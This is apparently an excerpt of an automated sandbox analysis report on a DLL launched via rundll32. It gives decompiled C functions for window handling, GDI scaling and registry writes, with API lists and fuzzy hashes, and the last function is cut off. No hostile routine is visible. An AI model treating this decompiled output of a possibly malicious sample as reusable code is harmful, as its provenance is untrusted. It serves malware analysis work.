                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseDeleteEnumOpen__mbsdec_l__strduplstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2107731021-0
                                                                                                        • Opcode ID: e12782b9b6b63dfd8a0d378f8f49bbab1ed3f408523f174e8c8d282b728816ba
                                                                                                        • Instruction ID: ea86eb6e90e6ecaea6e6e0f7a28099a3bf6e988834cb775aab1312c91ea76524
                                                                                                        • Opcode Fuzzy Hash: e12782b9b6b63dfd8a0d378f8f49bbab1ed3f408523f174e8c8d282b728816ba
                                                                                                        • Instruction Fuzzy Hash: CA11C4356001196EE712DB648CCAFAB77BCEF45657F10006AF540E6090DE759E449A25
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E10024F9A(struct HWND__* _a4, struct HWND__** _a8) {
                                                                                                        				struct HWND__* _t7;
                                                                                                        				void* _t13;
                                                                                                        				struct HWND__** _t15;
                                                                                                        				struct HWND__* _t16;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				struct HWND__* _t18;
                                                                                                        
                                                                                                        				_t18 = _a4;
                                                                                                        				_t17 = _t18;
                                                                                                        				if(_t18 != 0) {
                                                                                                        					L5:
                                                                                                        					if((GetWindowLongA(_t17, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                        						L8:
                                                                                                        						_t16 = _t17;
                                                                                                        						_t7 = _t17;
                                                                                                        						if(_t17 == 0) {
                                                                                                        							L10:
                                                                                                        							if(_t18 == 0 && _t17 != 0) {
                                                                                                        								_t17 = GetLastActivePopup(_t17);
                                                                                                        							}
                                                                                                        							_t15 = _a8;
                                                                                                        							if(_t15 != 0) {
                                                                                                        								if(_t16 == 0 || IsWindowEnabled(_t16) == 0 || _t16 == _t17) {
                                                                                                        									 *_t15 =  *_t15 & 0x00000000;
                                                                                                        								} else {
                                                                                                        									 *_t15 = _t16;
                                                                                                        									EnableWindow(_t16, 0);
                                                                                                        								}
                                                                                                        							}
                                                                                                        							return _t17;
                                                                                                        						} else {
                                                                                                        							goto L9;
                                                                                                        						}
                                                                                                        						do {
                                                                                                        							L9:
                                                                                                        							_t16 = _t7;
                                                                                                        							_t7 = GetParent(_t7);
                                                                                                        						} while (_t7 != 0);
                                                                                                        						goto L10;
                                                                                                        					}
                                                                                                        					_t17 = GetParent(_t17);
                                                                                                        					L7:
                                                                                                        					if(_t17 != 0) {
                                                                                                        						goto L5;
                                                                                                        					}
                                                                                                        					goto L8;
                                                                                                        				}
                                                                                                        				_t13 = E10024F5A();
                                                                                                        				if(_t13 != 0) {
                                                                                                        					L4:
                                                                                                        					_t17 =  *(_t13 + 0x20);
                                                                                                        					goto L7;
                                                                                                        				}
                                                                                                        				_t13 = E10009B1B();
                                                                                                        				if(_t13 != 0) {
                                                                                                        					goto L4;
                                                                                                        				}
                                                                                                        				_t17 = 0;
                                                                                                        				goto L8;
                                                                                                        			}










                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                                                        • String ID:
                                                                                                        • API String ID: 670545878-0
                                                                                                        • Opcode ID: 3909bdc39e99cdb824bdca6faa6a2406ae751b2bc3e8fab5d9ff2795ac8102c9
                                                                                                        • Instruction ID: db2e113731f48228abdd6c22f24f40818a75178a4d4874d17b56634b24980131
                                                                                                        • Opcode Fuzzy Hash: 3909bdc39e99cdb824bdca6faa6a2406ae751b2bc3e8fab5d9ff2795ac8102c9
                                                                                                        • Instruction Fuzzy Hash: BF11A33260163697D3A1EA69AEC4B1F72E8EF94BD2F930125EC01E7255DF71CC0042D9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E10013303(intOrPtr _a4) {
                                                                                                        				intOrPtr _v4;
                                                                                                        				void* __ecx;
                                                                                                        				void* __edi;
                                                                                                        				void* __esi;
                                                                                                        				struct HWND__* _t17;
                                                                                                        				struct HWND__* _t19;
                                                                                                        				signed int _t23;
                                                                                                        				intOrPtr _t31;
                                                                                                        				void* _t32;
                                                                                                        				struct HWND__* _t34;
                                                                                                        
                                                                                                        				_v4 = _t31;
                                                                                                        				_t17 = GetWindow(GetDesktopWindow(), 5);
                                                                                                        				_t34 = _t17;
                                                                                                        				_t36 = _t34;
                                                                                                        				if(_t34 == 0) {
                                                                                                        					return _t17;
                                                                                                        				} else {
                                                                                                        					_push(_t32);
                                                                                                        					while(1) {
                                                                                                        						_t32 = E1000E60C(_t31, _t32, _t34, _t36, _t34);
                                                                                                        						if(_t32 != 0) {
                                                                                                        							_t21 =  *((intOrPtr*)(_v4 + 0x20));
                                                                                                        							if( *((intOrPtr*)(_v4 + 0x20)) != _t34 && E10013272(_t21, _t34) != 0) {
                                                                                                        								_t23 = GetWindowLongA(_t34, 0xfffffff0);
                                                                                                        								if(_a4 != 0) {
                                                                                                        									__eflags = _t23 & 0x18000000;
                                                                                                        									if(__eflags == 0) {
                                                                                                        										__eflags =  *(_t32 + 0x3c) & 0x00000002;
                                                                                                        										if(__eflags != 0) {
                                                                                                        											__eflags =  *(_v4 + 0xb4);
                                                                                                        											if(__eflags == 0) {
                                                                                                        												ShowWindow(_t34, 4);
                                                                                                        												_t14 = _t32 + 0x3c;
                                                                                                        												 *_t14 =  *(_t32 + 0x3c) & 0xfffffffd;
                                                                                                        												__eflags =  *_t14;
                                                                                                        											}
                                                                                                        										}
                                                                                                        									}
                                                                                                        								} else {
                                                                                                        									if((_t23 & 0x18000000) == 0x10000000) {
                                                                                                        										ShowWindow(_t34, 0);
                                                                                                        										 *(_t32 + 0x3c) =  *(_t32 + 0x3c) | 0x00000002;
                                                                                                        									}
                                                                                                        								}
                                                                                                        							}
                                                                                                        						}
                                                                                                        						_t19 = GetWindow(_t34, 2);
                                                                                                        						_t34 = _t19;
                                                                                                        						if(_t34 == 0) {
                                                                                                        							return _t19;
                                                                                                        						}
                                                                                                        					}
                                                                                                        				}
                                                                                                        			}














                                                                                                        APIs
                                                                                                        • GetDesktopWindow.USER32 ref: 1001330C
                                                                                                        • GetWindow.USER32(00000000), ref: 10013319
                                                                                                        • GetWindowLongA.USER32 ref: 10013352
                                                                                                        • ShowWindow.USER32(00000000,00000000,?,00000000,?,?,10018F59,00000000), ref: 1001336E
                                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 10013393
                                                                                                        • GetWindow.USER32(00000000,00000002), ref: 1001339C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Show$DesktopLong
                                                                                                        • String ID:
                                                                                                        • API String ID: 3178490500-0
                                                                                                        • Opcode ID: 89b6a5fb984f68ab2f38c35047cb3a10e3b0aaac9b8ca157d8d87cce50ab9a07
                                                                                                        • Instruction ID: ce047d198d82d06fc6b0aff4bf3a6906737877de3fcc2137ee2c92f63e817dc5
                                                                                                        • Opcode Fuzzy Hash: 89b6a5fb984f68ab2f38c35047cb3a10e3b0aaac9b8ca157d8d87cce50ab9a07
                                                                                                        • Instruction Fuzzy Hash: 3D11BFB1505767AAD321C6258C89B4B77D8EF413A4F528114F960DA180CF74DE808BA9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E1001BE89(intOrPtr __ecx, CHAR* _a4, char* _a8, char* _a12) {
                                                                                                        				long _t21;
                                                                                                        				void* _t28;
                                                                                                        
                                                                                                        				if( *((intOrPtr*)(__ecx + 0x54)) == 0) {
                                                                                                        					return WritePrivateProfileStringA(_a4, _a8, _a12,  *(__ecx + 0x68));
                                                                                                        				}
                                                                                                        				if(_a8 != 0) {
                                                                                                        					_t28 = E1001BD53(__ecx, _a4);
                                                                                                        					if(_a12 != 0) {
                                                                                                        						if(_t28 == 0) {
                                                                                                        							L3:
                                                                                                        							return 0;
                                                                                                        						}
                                                                                                        						_t21 = RegSetValueExA(_t28, _a8, 0, 1, _a12, lstrlenA(_a12) + 1);
                                                                                                        						L10:
                                                                                                        						RegCloseKey(_t28);
                                                                                                        						return 0 | _t21 == 0x00000000;
                                                                                                        					}
                                                                                                        					if(_t28 == 0) {
                                                                                                        						goto L3;
                                                                                                        					}
                                                                                                        					_t21 = RegDeleteValueA(_t28, _a8);
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				_t28 = E1001BCC2(__ecx);
                                                                                                        				if(_t28 != 0) {
                                                                                                        					_t21 = RegDeleteKeyA(_t28, _a4);
                                                                                                        					goto L10;
                                                                                                        				}
                                                                                                        				goto L3;
                                                                                                        			}






                                                                                                        APIs
                                                                                                        • RegDeleteKeyA.ADVAPI32(00000000,?), ref: 1001BEAD
                                                                                                        • RegDeleteValueA.ADVAPI32(00000000,00000000), ref: 1001BECD
                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 1001BEF8
                                                                                                          • Part of subcall function 1001BCC2: RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1001BCF0
                                                                                                          • Part of subcall function 1001BCC2: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD13
                                                                                                          • Part of subcall function 1001BCC2: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1001BD2F
                                                                                                          • Part of subcall function 1001BCC2: RegCloseKey.ADVAPI32(?), ref: 1001BD3F
                                                                                                          • Part of subcall function 1001BCC2: RegCloseKey.ADVAPI32(?), ref: 1001BD49
                                                                                                        • WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 1001BF13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Close$CreateDelete$OpenPrivateProfileStringValueWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 1886894508-0
                                                                                                        • Opcode ID: 4ae44e6718026b6d3adbd8c401423c9add490a928bfb51c3cb960ce7f09616db
                                                                                                        • Instruction ID: d4c736123ee2640320a49d0280915aecea038eaea336f8f966d61f40c6868dd6
                                                                                                        • Opcode Fuzzy Hash: 4ae44e6718026b6d3adbd8c401423c9add490a928bfb51c3cb960ce7f09616db
                                                                                                        • Instruction Fuzzy Hash: 60112E36401A25EBDB629F64CC48BDE3AE9EF047A1F014414FE14AD060DB75CA96EB90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 77%
                                                                                                        			E100342AA(void* __ecx) {
                                                                                                        				int _v8;
                                                                                                        				char _v12;
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				void* __ebp;
                                                                                                        				int _t14;
                                                                                                        				void* _t40;
                                                                                                        
                                                                                                        				_push(__ecx);
                                                                                                        				_push(__ecx);
                                                                                                        				_t14 = GetDeviceCaps( *(__ecx + 8), 0xa);
                                                                                                        				_v12 = GetDeviceCaps( *(__ecx + 8), 8);
                                                                                                        				_v8 = _t14;
                                                                                                        				E10033FD4(__ecx,  &_v12);
                                                                                                        				SetMapMode( *(__ecx + 4), 1);
                                                                                                        				SetWindowOrgEx( *(__ecx + 4), 0, 0, 0);
                                                                                                        				SetViewportOrgEx( *(__ecx + 4),  *(__ecx + 0x20),  *(__ecx + 0x24), 0);
                                                                                                        				IntersectClipRect( *(__ecx + 4), 0xffffffff, 0xffffffff, _v12 + 2, _v8 + 2);
                                                                                                        				return E100341AE(_t14, __ecx, 0, _t40, 0);
                                                                                                        			}











                                                                                                        APIs
                                                                                                        • GetDeviceCaps.GDI32(?,0000000A), ref: 100342BF
                                                                                                        • GetDeviceCaps.GDI32(?,00000008), ref: 100342C8
                                                                                                          • Part of subcall function 10033FD4: GetViewportExtEx.GDI32(?,?), ref: 10033FE5
                                                                                                          • Part of subcall function 10033FD4: GetWindowExtEx.GDI32(?,?), ref: 10033FF2
                                                                                                        • SetMapMode.GDI32(?,00000001), ref: 100342E0
                                                                                                        • SetWindowOrgEx.GDI32(?,00000000,00000000,00000000), ref: 100342EE
                                                                                                        • SetViewportOrgEx.GDI32(?,?,?,00000000), ref: 100342FE
                                                                                                        • IntersectClipRect.GDI32(?,000000FF,000000FF,?,?), ref: 10034319
                                                                                                          • Part of subcall function 100341AE: GetViewportExtEx.GDI32(?,?,00000000,?,00000000,?,10034327,00000000), ref: 100341C6
                                                                                                          • Part of subcall function 100341AE: GetWindowExtEx.GDI32(?,?,?,00000000,?,10034327,00000000), ref: 100341D3
                                                                                                          • Part of subcall function 100341AE: GetDeviceCaps.GDI32(?,00000058), ref: 10034233
                                                                                                          • Part of subcall function 100341AE: GetDeviceCaps.GDI32(?,0000005A), ref: 10034250
                                                                                                          • Part of subcall function 100341AE: SetMapMode.GDI32(00000000,00000008), ref: 10034277
                                                                                                          • Part of subcall function 100341AE: SetWindowExtEx.GDI32(00000000,?,?,00000000), ref: 10034288
                                                                                                          • Part of subcall function 100341AE: SetViewportExtEx.GDI32(00000000,?,?,00000000), ref: 10034299
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDeviceViewportWindow$Mode$ClipIntersectRect
                                                                                                        • String ID:
                                                                                                        • API String ID: 1729379761-0
                                                                                                        • Opcode ID: d58e6b4533086b434433f3f8f68d4ad0ba625b868022c02acc2bf3f780f3c89c
                                                                                                        • Instruction ID: f51b1c442fe68410bda884420efd57ad2fc572574380a9b6e1a1ccd0c6538767
                                                                                                        • Opcode Fuzzy Hash: d58e6b4533086b434433f3f8f68d4ad0ba625b868022c02acc2bf3f780f3c89c
                                                                                                        • Instruction Fuzzy Hash: 16019231600A14BFDB615B66CD4AD4BBFFDEF85B10B00461DF556E22B0DA71A900CB10
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 95%
                                                                                                        			E10029945(struct HWND__* _a4) {
                                                                                                        				void* __ebx;
                                                                                                        				void* __edi;
                                                                                                        				struct HWND__* _t3;
                                                                                                        				struct HWND__* _t6;
                                                                                                        				void* _t7;
                                                                                                        				void* _t10;
                                                                                                        				struct HWND__* _t12;
                                                                                                        				struct HWND__* _t15;
                                                                                                        
                                                                                                        				_t3 = GetFocus();
                                                                                                        				_t15 = _t3;
                                                                                                        				if(_t15 != 0) {
                                                                                                        					_t12 = _a4;
                                                                                                        					if(_t15 == _t12) {
                                                                                                        						L10:
                                                                                                        						return _t3;
                                                                                                        					}
                                                                                                        					_push(_t7);
                                                                                                        					if(E10029831(_t7, _t10, _t12, _t15, 3) != 0) {
                                                                                                        						L5:
                                                                                                        						if(_t12 == 0 || (GetWindowLongA(_t12, 0xfffffff0) & 0x40000000) == 0) {
                                                                                                        							L8:
                                                                                                        							_t3 = SendMessageA(_t15, 0x14f, 0, 0);
                                                                                                        							goto L9;
                                                                                                        						} else {
                                                                                                        							_t6 = GetParent(_t12);
                                                                                                        							_t3 = GetDesktopWindow();
                                                                                                        							if(_t6 == _t3) {
                                                                                                        								L9:
                                                                                                        								goto L10;
                                                                                                        							}
                                                                                                        							goto L8;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_t3 = GetParent(_t15);
                                                                                                        					_t15 = _t3;
                                                                                                        					if(_t15 == _t12) {
                                                                                                        						goto L9;
                                                                                                        					}
                                                                                                        					_t3 = E10029831(GetParent, _t10, _t12, _t15, 2);
                                                                                                        					if(_t3 == 0) {
                                                                                                        						goto L9;
                                                                                                        					}
                                                                                                        					goto L5;
                                                                                                        				}
                                                                                                        				return _t3;
                                                                                                        			}












                                                                                                        APIs
                                                                                                        • GetFocus.USER32 ref: 10029946
                                                                                                        • GetParent.USER32(00000000), ref: 1002996F
                                                                                                          • Part of subcall function 10029831: GetWindowLongA.USER32 ref: 10029850
                                                                                                          • Part of subcall function 10029831: GetClassNameA.USER32(00000000,?,0000000A), ref: 10029865
                                                                                                        • GetWindowLongA.USER32 ref: 1002998A
                                                                                                        • GetParent.USER32(?), ref: 10029998
                                                                                                        • GetDesktopWindow.USER32 ref: 1002999C
                                                                                                        • SendMessageA.USER32 ref: 100299B0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$LongParent$ClassDesktopFocusMessageNameSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3020784601-0
                                                                                                        • Opcode ID: ba4afd5e6474a42e1ab121ad40d02b50c51118f1f472d7d6daffd8a97399a957
                                                                                                        • Instruction ID: acf78fc150144fee3bf4eaa21aef6e3b1a21923878db55d1d0888158b1e06290
                                                                                                        • Opcode Fuzzy Hash: ba4afd5e6474a42e1ab121ad40d02b50c51118f1f472d7d6daffd8a97399a957
                                                                                                        • Instruction Fuzzy Hash: 84F0F43150152026E362D72D7C95FAE5198DF81AF4F910218FD45F22D8DB289D8141A9
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 91%
                                                                                                        			E1003594E(void* _a4, char* _a8, char* _a12) {
                                                                                                        				void* _t14;
                                                                                                        				long _t18;
                                                                                                        				signed int _t20;
                                                                                                        				long _t25;
                                                                                                        
                                                                                                        				if(_a12 != 0) {
                                                                                                        					if(RegCreateKeyA(0x80000000, _a4,  &_a4) != 0) {
                                                                                                        						L6:
                                                                                                        						_t14 = 0;
                                                                                                        						L7:
                                                                                                        						return _t14;
                                                                                                        					}
                                                                                                        					_t25 = RegSetValueExA(_a4, _a12, 0, 1, _a8, lstrlenA(_a8) + 1);
                                                                                                        					_t18 = RegCloseKey(_a4);
                                                                                                        					if(_t18 != 0 || _t25 != 0) {
                                                                                                        						goto L6;
                                                                                                        					} else {
                                                                                                        						_t14 = _t18 + 1;
                                                                                                        						goto L7;
                                                                                                        					}
                                                                                                        				}
                                                                                                        				_t20 = RegSetValueA(0x80000000, _a4, 1, _a8, lstrlenA(_a8));
                                                                                                        				asm("sbb eax, eax");
                                                                                                        				return  ~_t20 + 1;
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • lstrlenA.KERNEL32(?), ref: 1003595A
                                                                                                        • RegSetValueA.ADVAPI32(80000000,?,00000001,?,00000000), ref: 1003596E
                                                                                                        • RegCreateKeyA.ADVAPI32(80000000,?,?), ref: 10035988
                                                                                                        • lstrlenA.KERNEL32(?), ref: 10035995
                                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,?,00000001), ref: 100359AA
                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 100359B5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Valuelstrlen$CloseCreate
                                                                                                        • String ID:
                                                                                                        • API String ID: 306239685-0
                                                                                                        • Opcode ID: a94474bab4ef5212944d8fbd827d5bcf346c71c4084935d8397085e506667b1f
                                                                                                        • Instruction ID: eef8e99eaa8213a472842ce7001fabd756c560ec0ae423e695ca1d1f488994b8
                                                                                                        • Opcode Fuzzy Hash: a94474bab4ef5212944d8fbd827d5bcf346c71c4084935d8397085e506667b1f
                                                                                                        • Instruction Fuzzy Hash: 4B012832500219FFEF525FA0DC48B993B6AEB087A3F108411FE1AE8070D7728A609B90
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 38%
                                                                                                        			E100298D3(struct HWND__* _a4, struct tagPOINT _a8, intOrPtr _a12) {
                                                                                                        				struct tagRECT _v20;
                                                                                                        				struct HWND__* _t12;
                                                                                                        				struct HWND__* _t21;
                                                                                                        
                                                                                                        				ClientToScreen(_a4,  &_a8);
                                                                                                        				_push(5);
                                                                                                        				_push(_a4);
                                                                                                        				while(1) {
                                                                                                        					_t12 = GetWindow();
                                                                                                        					_t21 = _t12;
                                                                                                        					if(_t21 == 0) {
                                                                                                        						break;
                                                                                                        					}
                                                                                                        					if(GetDlgCtrlID(_t21) != 0 && (GetWindowLongA(_t21, 0xfffffff0) & 0x10000000) != 0) {
                                                                                                        						GetWindowRect(_t21,  &_v20);
                                                                                                        						_push(_a12);
                                                                                                        						if(PtInRect( &_v20, _a8) != 0) {
                                                                                                        							return _t21;
                                                                                                        						}
                                                                                                        					}
                                                                                                        					_push(2);
                                                                                                        					_push(_t21);
                                                                                                        				}
                                                                                                        				return _t12;
                                                                                                        			}







                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Rect$ClientCtrlLongScreen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1315500227-0
                                                                                                        • Opcode ID: 8982c2fd6fcec8ea508d22f26e7a804004c5006e86d2846448e6ad8d0ebf8d54
                                                                                                        • Instruction ID: 8d5d5133ea00a710a2f54a7d984ebf02fce7fee90322d912fb676cbb000024d2
                                                                                                        • Opcode Fuzzy Hash: 8982c2fd6fcec8ea508d22f26e7a804004c5006e86d2846448e6ad8d0ebf8d54
                                                                                                        • Instruction Fuzzy Hash: C8016235501525BBDB119F589C49E9E376CEF517A1F404118FD11A6050EB30DA41CB94
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E100059F0(void* __ebx, int* __esi) {
                                                                                                        				int _t15;
                                                                                                        				int _t18;
                                                                                                        				intOrPtr _t26;
                                                                                                        				void* _t28;
                                                                                                        
                                                                                                        				_t26 =  *((intOrPtr*)(_t28 + 8));
                                                                                                        				 *((intOrPtr*)(_t28 + 0x14)) = GetDeviceCaps( *(_t26 + 8), 0x5a);
                                                                                                        				 *__esi = MulDiv( *__esi, GetDeviceCaps( *(__ebx + 8), 0x5a),  *(_t28 + 0xc));
                                                                                                        				_t15 = GetDeviceCaps( *(_t26 + 8), 0x58);
                                                                                                        				_t18 = MulDiv(__esi[1], GetDeviceCaps( *(__ebx + 8), 0x58), _t15);
                                                                                                        				__esi[1] = _t18;
                                                                                                        				return _t18;
                                                                                                        			}








                                                                                                        APIs
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10005A02
                                                                                                        • GetDeviceCaps.GDI32(?,0000005A), ref: 10005A0E
                                                                                                        • MulDiv.KERNEL32(00000000,00000000,?), ref: 10005A19
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10005A27
                                                                                                        • GetDeviceCaps.GDI32(?,00000058), ref: 10005A31
                                                                                                        • MulDiv.KERNEL32(?,00000000,00000000), ref: 10005A39
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.712832439.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.712822197.0000000010000000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712894195.0000000010058000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712922529.0000000010071000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712934032.0000000010074000.00000008.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712978462.0000000010097000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000003.00000002.712987757.000000001009C000.00000002.00020000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsDevice
                                                                                                        • String ID:
                                                                                                        • API String ID: 328075279-0
                                                                                                        • Opcode ID: a5c112f78b88f4bf1311636ece6e0dd5a93fb4083a1b161f9464fc113d583973
                                                                                                        • Instruction ID: 85e2ce73d3cc40e8ba857868d8035ba56c050d68c0307686b6259cd0027a5177
                                                                                                        • Opcode Fuzzy Hash: a5c112f78b88f4bf1311636ece6e0dd5a93fb4083a1b161f9464fc113d583973
                                                                                                        • Instruction Fuzzy Hash: 88F0EC75640704AFD750DFA9CC48D47F7ECAF98B01F008919FA89D7290D670E9408F60
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 94%
                                                                                                        			E1001120A(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4) {
                                                                                                        				intOrPtr _v8;
                                                                                                        				signed int _v12;
                                                                                                        				signed int _v16;
                                                                                                        				char* _v20;
                                                                                                        				signed int _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v40;
